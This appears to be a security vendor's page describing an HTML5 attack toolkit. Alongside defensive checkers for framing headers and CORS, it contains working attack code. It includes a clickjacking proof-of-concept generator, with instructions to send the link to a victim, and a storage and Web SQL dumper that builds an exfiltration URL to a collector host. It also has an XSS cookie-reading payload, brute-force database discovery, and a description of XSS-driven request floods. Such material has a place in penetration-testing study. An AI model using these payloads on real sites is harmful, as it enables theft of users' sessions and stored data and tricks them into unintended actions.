AppSec Labs stays at the front line of new technologies. Whether researching HTML5, developing an HTML5 attack framework, or publishing tools for finding, testing and exploiting vulnerabilities in HTML5-based websites and in regular websites that have not been protected against HTML5 functionality, AppSec Labs makes sure it stays on top of the game.
The HTML5 Toolkit contains the following tools:
Clickjacking - Tester
AppSec Labs is proud to introduce the ClickJacking Tester, a tool designed to let information security specialists around the world easily check online whether their websites are vulnerable to clickjacking (UI redressing) attacks:
http://online.attacker-site.com/html5/ClickjackingTester/
How to Use:
- Open the tool in your browser.
- Enter your website’s URL in the text box.
- Check the “add allow-forms to Iframe” box to add allow-forms to the iframe's sandbox attribute if the target page needs to submit forms (a sandboxed iframe without allow-top-navigation also stops the framed page from navigating the top window, which defeats script-based frame busting).
- Hit ‘enter’ or click submit button.
- If the page is vulnerable, it will be displayed in the frame on the left side of the testing page: a page that renders inside a foreign frame is not protected by X-Frame-Options or by a Content-Security-Policy frame-ancestors directive. If the frame stays blank, the browser refused to render it. The result reflects the browser you are testing with.
- Take a screenshot for your PoC and enjoy!
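The online tester answers the question empirically by trying to frame your URL. The following added example (it is not the ClickJacking Tester's own code) reproduces that decision offline from a page's response headers: a CSP frame-ancestors directive wins, otherwise X-Frame-Options decides, and anything else leaves the page frameable. All header sets and origins are constructed for the example.

```javascript
// Added example: offline version of the framing decision a browser makes.
// Not the ClickJacking Tester's code; header sets and origins are constructed.

// Parse a Content-Security-Policy value into { directive: [source tokens] }.
function parseCsp(header) {
  const out = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) out[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return out;
}

// Does one frame-ancestors source token permit framerOrigin to frame pageOrigin?
function sourceMatches(token, framerOrigin, pageOrigin) {
  const t = token.replace(/^'|'$/g, '').toLowerCase();
  if (t === 'none') return false;
  if (t === '*') return true;
  if (t === 'self') return framerOrigin === pageOrigin;
  const framerHost = new URL(framerOrigin).host;
  if (t.startsWith('*.')) return framerHost.endsWith(t.slice(1)); // wildcard host
  return t.includes('://') ? framerOrigin.toLowerCase() === t : framerHost === t;
}

// Returns { frameable, reason }. A CSP frame-ancestors directive takes precedence
// and makes X-Frame-Options irrelevant; otherwise DENY blocks everything,
// SAMEORIGIN allows only the page's own origin, and anything else (no header,
// or the obsolete ALLOW-FROM that current browsers ignore) leaves the page frameable.
function frameable(headers, pageOrigin, framerOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const csp = h['content-security-policy'] ? parseCsp(h['content-security-policy']) : {};
  if (csp['frame-ancestors']) {
    const ok = csp['frame-ancestors'].some(t => sourceMatches(t, framerOrigin, pageOrigin));
    return { frameable: ok, reason: 'CSP frame-ancestors ' + csp['frame-ancestors'].join(' ') };
  }
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return { frameable: false, reason: 'X-Frame-Options: DENY' };
  if (xfo === 'SAMEORIGIN') {
    return { frameable: framerOrigin === pageOrigin, reason: 'X-Frame-Options: SAMEORIGIN' };
  }
  if (xfo.startsWith('ALLOW-FROM')) {
    return { frameable: true, reason: 'X-Frame-Options: ALLOW-FROM is ignored by current browsers' };
  }
  return { frameable: true, reason: 'no frame protection header' };
}

// Constructed header sets (not taken from any real site).
const SAMPLES = {
  unprotected: { 'Content-Type': 'text/html' },
  xfoDeny: { 'X-Frame-Options': 'DENY' },
  xfoSameOrigin: { 'X-Frame-Options': 'SAMEORIGIN' },
  xfoAllowFrom: { 'X-Frame-Options': 'ALLOW-FROM https://partner.example' },
  cspSelfAndPartner: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self' https://partner.example" },
  cspNone: { 'content-security-policy': "frame-ancestors 'none'" },
  cspOverridesXfo: { 'X-Frame-Options': 'DENY', 'Content-Security-Policy': 'frame-ancestors *' },
};

// Evaluate every sample as if framed from framerOrigin; returns { name: boolean }.
function checkAll(pageOrigin, framerOrigin, samples = SAMPLES) {
  const result = {};
  for (const [name, headers] of Object.entries(samples)) {
    result[name] = frameable(headers, pageOrigin, framerOrigin).frameable;
  }
  return result;
}

console.log(checkAll('https://victim.example', 'https://attacker.example'));
```

Two of the sample cases are worth a second look when reading a tester result: ALLOW-FROM gives no protection in current browsers, and a CSP frame-ancestors directive that allows everything overrides an X-Frame-Options: DENY sent on the same response.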
Clickjacker – Exploit Clickjacking Easily
Clickjacker is a tool that helps you exploit clickjacking easily. Simply enter the vulnerable URL and position the ‘social engineering’ decoy over the element you want the victim to click, using the arrow buttons. Clickjacker dynamically generates, on the right-hand side, a link to send to the victim.
In addition, you get the raw HTML code to put into an HTML file and upload to your own server, so that the link you send to the victim points at your own domain.
Clickjacker’s URL address
http://attacker-site.com/html5/clickjacker/clickjacker_clickjacking_exploiter.htm
This tool is based on the HTML5_attack_framework.
Risks of clickjacking
As in a CSRF attack, the user can be manipulated into performing actions on the website; because the click lands on the real page, anti-CSRF tokens do not help. It is easiest to make the user click a specific button (such as ‘+1’, for example), but with advanced exploitation an attacker can make a user enter text into a text box or read text from a website.
Reading data by clickjacking via clickjacker
Clickjacker contains an advanced option that enables reading data by clickjacking. To use it, change the social engineering type in the advanced tab from ‘click’ to ‘read’. Then manually set the ‘iFrame container’ properties in the advanced tab to the size of the region you want to expose, and set the opacity to 100 so that the framed content is fully visible and the victim can be induced to read (and, for example, re-type) it.
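What the generated page looks like, as an added example that is not the Clickjacker tool's own code: in ‘click’ mode the framed target sits on top of a decoy button at near-zero opacity, shifted so the element you chose is exactly under the decoy; in ‘read’ mode a small container shows the target at opacity 100 so the victim can read the exposed value. The target URL, offsets, sizes, sandbox tokens and decoy text are assumptions made for the example.

```javascript
// Added example: generator for a clickjacking proof-of-concept page in the
// style of the Clickjacker tool. Not the tool's code; all inputs are assumed.

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

function buildClickjackPoc(opts) {
  const {
    targetUrl,                              // vulnerable (frameable) page
    mode = 'click',                         // 'click' or 'read'
    offsetX = 0, offsetY = 0,               // position of the target element inside the framed page
    width = 300, height = 80,               // size of the container window shown to the victim
    opacity = mode === 'read' ? 100 : 1,    // percent, as in the tool's advanced tab
    allowForms = false,                     // mirrors the tester's "add allow-forms to Iframe" box
    decoyText = mode === 'read' ? 'Enter the code shown below to continue'
                                : 'Click here to continue',
  } = opts;
  if (!/^https?:\/\//i.test(targetUrl)) throw new Error('targetUrl must be an absolute http(s) URL');
  if (mode !== 'click' && mode !== 'read') throw new Error("mode must be 'click' or 'read'");
  if (opacity < 0 || opacity > 100) throw new Error('opacity is a percentage');

  // Assumed token set. Without allow-top-navigation the framed page cannot
  // run script-based frame busting (top.location = ...).
  const sandbox = allowForms ? ' sandbox="allow-forms allow-scripts allow-same-origin"' : '';

  // The frame is larger than the container and shifted by the negative
  // offsets, so the chosen element lands at the container's top-left corner.
  const frameStyle = `position:absolute; left:${-offsetX}px; top:${-offsetY}px; `
    + `width:${width + offsetX}px; height:${height + offsetY}px; border:0; `
    + `opacity:${opacity / 100}; z-index:2;`;
  const decoy = mode === 'click'
    ? `<button style="position:absolute; left:0; top:0; width:${width}px; height:${height}px; z-index:1;">`
      + `${escapeHtml(decoyText)}</button>`
    : '';
  const caption = mode === 'read'
    ? `<p>${escapeHtml(decoyText)}</p><input type="text" placeholder="code">\n`
    : '';
  return '<!doctype html>\n<html><body>\n' + caption
    + `<div style="position:relative; width:${width}px; height:${height}px; overflow:hidden;">\n`
    + decoy + `<iframe src="${escapeHtml(targetUrl)}"${sandbox} style="${frameStyle}"></iframe>\n`
    + '</div>\n</body></html>\n';
}

console.log(buildClickjackPoc({ targetUrl: 'https://victim.example/settings', offsetX: 120, offsetY: 340 }));
```

Save the returned string as an HTML file on your own server, as the tool suggests, and send that link. The read mode only makes sense for content the victim cannot otherwise see from your page; the exposed value still has to be obtained through the victim (re-typing it into your form), since the frame's content stays inaccessible to your script.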
CORS (Cross Origin Resource Sharing) Tester
Cross Origin Resource Sharing allows a page on one domain to read data from another domain with JavaScript (via AJAX requests), provided the responding server permits it. To test and create a proof of concept, use this tool: provide the relevant details (URL, POST data, HTTP method etc.) and the CORS tester will build a custom request and try to read the response.
If the response is displayed, the page is vulnerable: the server returned an Access-Control-Allow-Origin header matching the tester's origin (or ‘*’), and, if cookies were sent, Access-Control-Allow-Credentials: true as well. A page readable only without cookies exposes its public content; a page readable with cookies exposes the logged-in user's data.
CORS tester’s URL address
http://online.attacker-site.com/html5/cors_tester/
This tool is based on the HTML5_attack_framework.
Risks of CORS vulnerability
- If sending cookies is allowed (Access-Control-Allow-Credentials: true together with a reflected or attacker-controllable Allow-Origin), the attacker can read the user's data.
- Denial of Service and drive-by attacks launched from innocent users' browsers.
- Reading the website's content via an allowed user's browser (e.g. from an allowed country or from the local network).
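The rule the browser applies before it lets a script read the response, as an added example that is not the CORS tester's own code. The tester discovers the outcome by sending the request; here the check is written out and run against three constructed server policies (reflected origin, wildcard, allow-list), including the preflight that gates the non-simple methods the tester lets you choose. Origins and policies are assumptions.

```javascript
// Added example: the browser-side CORS decision and a preflight check, run
// against constructed server policies. Not the CORS tester's code.

function lowerKeys(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v).trim();
  return h;
}

// Would the browser expose this response to a script running on requestOrigin?
function corsExposes(response, requestOrigin, withCredentials) {
  const h = lowerKeys(response.headers);
  const acao = h['access-control-allow-origin'];
  const acac = (h['access-control-allow-credentials'] || '').toLowerCase();
  if (acao === undefined) return { readable: false, why: 'no Access-Control-Allow-Origin' };
  if (withCredentials) {
    // With cookies attached the wildcard is rejected and the server must opt in explicitly.
    // Note: a server answering "null" is as exposed as a reflecting one, because a
    // sandboxed iframe or a local file runs with the origin "null".
    if (acao === '*') return { readable: false, why: "'*' is not accepted for credentialed requests" };
    if (acao !== requestOrigin) return { readable: false, why: 'Allow-Origin does not match' };
    if (acac !== 'true') return { readable: false, why: 'Allow-Credentials is not true' };
    return { readable: true, why: "the victim's authenticated data is readable from " + requestOrigin };
  }
  if (acao === '*' || acao === requestOrigin) return { readable: true, why: 'readable without cookies' };
  return { readable: false, why: 'Allow-Origin does not match' };
}

// Non-simple methods (PUT, DELETE, OPTIONS, ...) are only sent after a preflight
// whose response must pass the same origin check and list the method.
function preflightAllows(preflightResponse, method, requestOrigin, withCredentials) {
  const m = method.toUpperCase();
  if (['GET', 'HEAD', 'POST'].includes(m)) return true; // simple request (with simple headers): no preflight
  if (!corsExposes(preflightResponse, requestOrigin, withCredentials).readable) return false;
  const allowed = (lowerKeys(preflightResponse.headers)['access-control-allow-methods'] || '')
    .split(',').map(s => s.trim().toUpperCase()).filter(Boolean);
  return allowed.includes(m) || (!withCredentials && allowed.includes('*'));
}

// Constructed server policies: each maps the request's Origin header to the
// response headers the server would send.
const reflectingServer = origin => ({
  headers: { 'Access-Control-Allow-Origin': origin, 'Access-Control-Allow-Credentials': 'true',
             'Access-Control-Allow-Methods': 'GET, POST, PUT, DELETE' },
});
const wildcardServer = () => ({ headers: { 'Access-Control-Allow-Origin': '*' } });
const allowListServer = (origin, allowed = ['https://app.example']) => ({
  headers: allowed.includes(origin)
    ? { 'Access-Control-Allow-Origin': origin, 'Access-Control-Allow-Credentials': 'true', Vary: 'Origin' }
    : {},
});

// What the tester would report for one server from attackerOrigin.
function probe(server, attackerOrigin) {
  return {
    anonymous: corsExposes(server(attackerOrigin), attackerOrigin, false).readable,
    withCookies: corsExposes(server(attackerOrigin), attackerOrigin, true).readable,
    deleteWithCookies: preflightAllows(server(attackerOrigin), 'DELETE', attackerOrigin, true),
  };
}

console.log('reflecting', probe(reflectingServer, 'https://attacker.example'));
console.log('wildcard  ', probe(wildcardServer, 'https://attacker.example'));
console.log('allow-list', probe(allowListServer, 'https://attacker.example'));
```

The reflecting policy is the one the tester flags as critical: it reads with cookies and accepts a credentialed DELETE. The wildcard policy exposes only public content, and the allow-list policy exposes nothing to a foreign origin (the Vary: Origin header keeps caches from serving one origin's response to another).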
HTML5 Denial of Service Checker
One of the easy DDoS options is to find a persistent XSS in a popular website and inject a script that sends many requests to the victim website. A drive-by is when the attacker uses one website to attack another: he injects code into vulnerable websites, which then attack the victim site whenever innocent users browse them. This tool tests how many requests your browser can send in one minute using different methodologies.
There are HTML4 options and HTML5 options. HTML5 (XMLHttpRequest with CORS) also makes it possible to send POST requests (which in HTML4 can only be done very slowly, through form submissions). In addition, HTML5 allows other methods such as PUT/DELETE/OPTIONS, which the browser only sends after a successful preflight, and allows cookies to be attached to the request (whether the response can then be read depends on the victim website's CORS headers). To check whether the website allows cookies and the other HTML5 options, use our CORS tester tool.
HTML5 Denial of Service (DoS) tester’s URL address
http://online.attacker-site.com/html5/cors/dos_test.php
This tool is based on the HTML5_attack_framework.
Common risks of DoS
- Overloading the server and causing it to slow down
- Crashing the server
Web Messaging Exploiter
The Web Messaging Exploiter is a tool for monitoring and attacking web messaging (postMessage), which lets a page and its iframes exchange data. The messages pass between the parent page and the iframe inside the browser, so they never reach an intercepting proxy and do not appear in the browser's network view.
Web messaging exploiter’s URL address
http://attacker-site.com/html5/web_messaging/web_messaging_exploiter.htm
Malicious window
http://attacker-site.com/html5/web_messaging/web_messaging_malicious_window.htm
How to use it
- Open the Web Messaging Exploiter page.
- Choose the scenario (whether you want to attack an iframe or the iframe's container window).
- In a real scenario, to exploit a container you must have a way to control the iframe's URL, so that the container loads your page into the frame.
- From the exploiter page you can watch the messages between the victim's window and the malicious window, and also send your own messages.
Risks of Web Messaging vulnerability:
- XSS (Cross Site Scripting), if the website handles the message data insecurely (for example, writes it into the DOM as HTML).
- CSRF-like actions, if the website performs actions for the user without validating the origin of the messages (event.origin).
- Information leakage, if the website sends user information without naming the destination origin (a targetOrigin of ‘*’).
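The three risks above, as an added example that is not the Web Messaging Exploiter's own code: a receiver that trusts every sender next to one that checks event.origin, and a parent that sends a secret into a frame with targetOrigin ‘*’ next to one that names the destination. The browser's window objects are replaced by plain objects so the logic runs in Node; the origins, the message format and the ‘balance’ field are constructed for the example.

```javascript
// Added example: vulnerable vs hardened postMessage handling, simulated in
// Node. Not the exploiter's code; origins and message shapes are assumed.

const APP_ORIGIN = 'https://app.example';
const PARTNER_ORIGIN = 'https://partner.example';
const ATTACKER_ORIGIN = 'https://attacker.example';

// Stand-in for a browser window: an origin, message listeners and a
// postMessage that enforces targetOrigin the way the browser does.
function makeWindow(origin) {
  const win = { origin, listeners: [], received: [] };
  win.addEventListener = (type, fn) => { if (type === 'message') win.listeners.push(fn); };
  win.postMessage = (data, targetOrigin, source) => {
    // The browser silently drops the message if targetOrigin names another origin.
    if (targetOrigin !== '*' && targetOrigin !== origin) return false;
    const event = { data, origin: source.origin, source };
    win.received.push(event);
    win.listeners.forEach(fn => fn(event));
    return true;
  };
  return win;
}

// The application page: an innerHTML-style sink, a sensitive action and a secret.
function makeApp(origin) {
  return { win: makeWindow(origin), html: '', text: '', transfers: [], balance: 4200 };
}

// Vulnerable receiver: no origin check, data rendered as HTML, action obeyed,
// reply broadcast to whatever origin the sender has.
function installVulnerable(app) {
  app.win.addEventListener('message', event => {
    app.html = '<div class="status">' + event.data.text + '</div>';
    if (event.data.action === 'transfer') app.transfers.push(event.data.amount);
    event.source.postMessage({ balance: app.balance }, '*', app.win);
  });
}

// Hardened receiver: verify the sender, treat data as text (textContent, not
// innerHTML), validate the action, and name the origin allowed to get the reply.
function installHardened(app, trustedOrigin) {
  app.win.addEventListener('message', event => {
    if (event.origin !== trustedOrigin) return;
    app.html = '<div class="status"></div>';
    app.text = typeof event.data.text === 'string' ? event.data.text : '';
    const amount = event.data.amount;
    if (event.data.action === 'transfer' && Number.isInteger(amount) && amount > 0) app.transfers.push(amount);
    event.source.postMessage({ balance: app.balance }, trustedOrigin, app.win);
  });
}

// One message from a window on senderOrigin to the app (the exploiter's
// "malicious window" role when senderOrigin is the attacker's).
function exchange(install, senderOrigin) {
  const app = makeApp(APP_ORIGIN);
  install(app);
  const sender = makeWindow(senderOrigin);
  const payload = { text: '<img src=x onerror="alert(document.cookie)">', action: 'transfer', amount: 1000 };
  app.win.postMessage(payload, '*', sender);
  return {
    xss: app.html.includes('onerror'),
    transferred: app.transfers.slice(),
    balanceReply: sender.received.length ? sender.received[0].data.balance : null,
  };
}

// Parent sends a secret into an iframe whose URL the attacker managed to change:
// targetOrigin '*' delivers it anyway, a named origin does not.
function sendSecretToFrame(targetOrigin) {
  const parent = makeWindow(APP_ORIGIN);
  const hijackedFrame = makeWindow(ATTACKER_ORIGIN);
  hijackedFrame.postMessage({ token: 'sess-1234' }, targetOrigin, parent);
  return hijackedFrame.received.length === 1;
}

console.log('vulnerable:', exchange(installVulnerable, ATTACKER_ORIGIN));
console.log('hardened  :', exchange(app => installHardened(app, PARTNER_ORIGIN), ATTACKER_ORIGIN));
console.log('leak via *:', sendSecretToFrame('*'), 'leak via named origin:', sendSecretToFrame(APP_ORIGIN));
```

When you watch traffic in the exploiter, the two questions to ask of each handler are exactly these: does the receiver look at event.origin before acting, and does every postMessage call name a targetOrigin other than ‘*’ when the data is sensitive.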
HTML5 Storage Dumper
Local/Session Storage
Some websites store information in session/local/global storage (globalStorage is a legacy Firefox-only API). To show how an attacker can exploit this and send all of the existing storages (session storage, local storage, global storage) to the attacker's server via XSS, use the function html5storage_dump_storages(). An example proof of concept is part of the HTML5_attack_framework.
SQLite Storage (Web SQL Database)
To collect the SQL data you must use SQL queries; the complication is that the Web SQL API is asynchronous: executeSql() delivers its results through callbacks, so the data is not available when the call returns. The exploitation is therefore a bit complex: the function updates a global variable named ‘dump’, and you collect the information from it afterwards. A further problem is that you need to know the database name; the HTML5 exploitation framework uses a number of methods to find it. The basic exploitation that collects the local/session storages and the SQLite storage is part of the HTML5_attack_framework. It fetches with:
- sqlite_dump_database_by_obj – every database object reachable from the page's variables.
- sqlite_dump_database_by_dict – the following database names: ‘sql’, ‘SQL’, ‘DB’, ‘db’, ‘SQLITE’, ‘SQLite’, ‘sqlite’, ‘DB1’, ‘db1’, ‘DataBase’, ‘DATEBASE’, ‘sqli’.
- sqlite_dump_database_by_bruteforce – every name of two lowercase letters, without prefix or suffix.
To dump a specific known database, use something like:
sqlite_dump_database_if_exist('my_data_base');
setTimeout("alert(dump)", 500); // the queries are asynchronous: read 'dump' only after they have had time to complete
You can also use specific functions for specific exploits:
- sqlite_dump_database_if_exist(name) – receives the name of a database and dumps it (into the dump variable) if it exists.
- sqlite_dump_database_by_dict(dict) – receives a list of candidate names (for example [‘dbname’, ‘database1’]) and fetches the data of any that exist.
- sqlite_dump_database_by_obj() – checks all the variables of the page and, if one of them is an open database object, fetches its data without knowing the database name.
- sqlite_dump_database(DBname, DBobj) – use this if you know the database. The optional DBobj parameter lets you pass an object that is already connected to the database.
- sqlite_dump_table(DBname, table, DBobj) – dumps a specific table. DBobj is optional here too.
- sqlite_dump_database_by_bruteforce(chars, str, prefix, endfix, cur_char, cur_change) – searches for databases by brute force. Be aware that it takes a few seconds.
As an example of a run, see the following code:
// candidate character sets; only alphabeta is used in this run
var alphabeta = "abcdefghijklmnopqrstuvwxyz";
var alphanumeric = "abcdefghijklmnopqrstuvwxyz0123456789";
var capandlittle = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
var maxlen = 2;   // try every name of maxlen characters
var prefix = "";
var endfix = "";
sqlite_dump_database_by_bruteforce(alphabeta, " ".repeat(maxlen), prefix, endfix, 0, 0);
All of the above functions dump the data into the global variable ‘dump’.
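The two dumps described in this section, as an added example that is not the framework's html5storage_dump_storages or sqlite_dump_* code: Web Storage is read synchronously by index, while the Web SQL database is read through its asynchronous callback API, with the per-table queries issued inside the sqlite_master callback so they join the same transaction and the result collected when the transaction completes, instead of polling a global after a setTimeout. Both storages are mocked with the browser's interface so the code runs in Node; the contents, table names and collector URL are constructed.

```javascript
// Added example: Web Storage and Web SQL dumpers with an exfiltration beacon.
// Not the framework's code; storages, rows and the collector URL are constructed.

// Storage-like object with the same length/key/getItem surface as window.localStorage.
function makeStorage(entries) {
  const keys = Object.keys(entries);
  return { length: keys.length, key: i => keys[i], getItem: k => entries[k] };
}

// Walk a Storage object by index, which also catches keys the app never lists.
function dumpStorage(storage) {
  const out = {};
  for (let i = 0; i < storage.length; i++) {
    const k = storage.key(i);
    out[k] = storage.getItem(k);
  }
  return out;
}

// globalStorage is a legacy Firefox-only API; it is dumped only if present.
function dumpAllStorages(win) {
  const out = {};
  for (const name of ['localStorage', 'sessionStorage', 'globalStorage']) {
    if (win[name]) out[name] = dumpStorage(win[name]);
  }
  return out;
}

// Beacon the injected script would fire: base64 of the JSON in a query string.
// In a browser use btoa(unescape(encodeURIComponent(json))) instead of Buffer.
function exfilUrl(collector, payload) {
  const b64 = Buffer.from(JSON.stringify(payload), 'utf8').toString('base64');
  return collector + '?d=' + encodeURIComponent(b64);
}

// Web SQL: every executeSql result arrives in a callback. Table queries are
// issued from inside the sqlite_master callback so they run in the same
// transaction; the promise resolves from the transaction's success callback.
function dumpWebSql(db) {
  return new Promise((resolve, reject) => {
    const dump = {};
    db.transaction(tx => {
      tx.executeSql("SELECT name FROM sqlite_master WHERE type='table'", [], (t, rs) => {
        for (let i = 0; i < rs.rows.length; i++) {
          const table = rs.rows.item(i).name;
          if (table.startsWith('__')) continue; // WebKit's internal bookkeeping table
          t.executeSql('SELECT * FROM ' + table, [], (t2, rs2) => {
            dump[table] = [];
            for (let j = 0; j < rs2.rows.length; j++) dump[table].push(rs2.rows.item(j));
          });
        }
      });
    }, reject, () => resolve(dump));
  });
}

// Fake openDatabase(): enough of the transaction/executeSql contract to run
// dumpWebSql, with callbacks deferred the way a real engine's are.
function fakeOpenDatabase(tables) {
  return {
    transaction(body, onError, onSuccess) {
      let pending = 0;
      const tx = {
        executeSql(query, args, onResult) {
          pending++;
          setTimeout(() => {
            const m = /^SELECT \* FROM (\w+)$/.exec(query);
            const rows = m ? (tables[m[1]] || []) : Object.keys(tables).map(name => ({ name }));
            pending--;
            if (onResult) onResult(tx, { rows: { length: rows.length, item: i => rows[i] } });
            if (pending === 0) onSuccess(); // commit once no statement is outstanding
          }, 0);
        },
      };
      body(tx);
      if (pending === 0) onSuccess();
    },
  };
}

// Constructed browser state.
const fakeWindow = {
  localStorage: makeStorage({ auth_token: 'tok-0f3a9', theme: 'dark' }),
  sessionStorage: makeStorage({ cart: '[{"sku":"A1","qty":2}]' }),
};
const fakeDb = fakeOpenDatabase({
  __WebKitDatabaseInfoTable__: [],
  users: [{ id: 1, email: 'alice@example.com' }],
  notes: [{ id: 7, body: 'call the bank' }],
});

console.log(exfilUrl('https://collector.example/c', dumpAllStorages(fakeWindow)));
dumpWebSql(fakeDb).then(rows => console.log(JSON.stringify(rows)));
```

The promise wrapper is the practical replacement for the framework's "read the global ‘dump’ after a setTimeout" pattern: the caller gets the complete dump exactly when the transaction finishes, however long the queries take.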
HTML5 Attack Framework
HTML5 adds functionality to the browser; this framework was created to help penetration testers find, test and exploit vulnerabilities in that functionality.
The framework contains helper functions such as base64enc, base64dec, int and getElement; HTML5 functions such as cors_send and web_messaging_send_to_iframe; and exploit functions such as clickjacking_update_HTML_elements and html5storage_dump_storages.
Framework’s URL address
https://appsec-labs.com/html5/html5_attack_framerwork.js
Tools that are based on this framework:
- Clickjacker – exploit clickjacking easily
- CORS (Cross Origin Resource Sharing) tester
- HTML5 Denial of Service (DoS) tester
- Web Messaging Exploiter (includes the Web Messaging Proxy)
- HTML5 storage dumper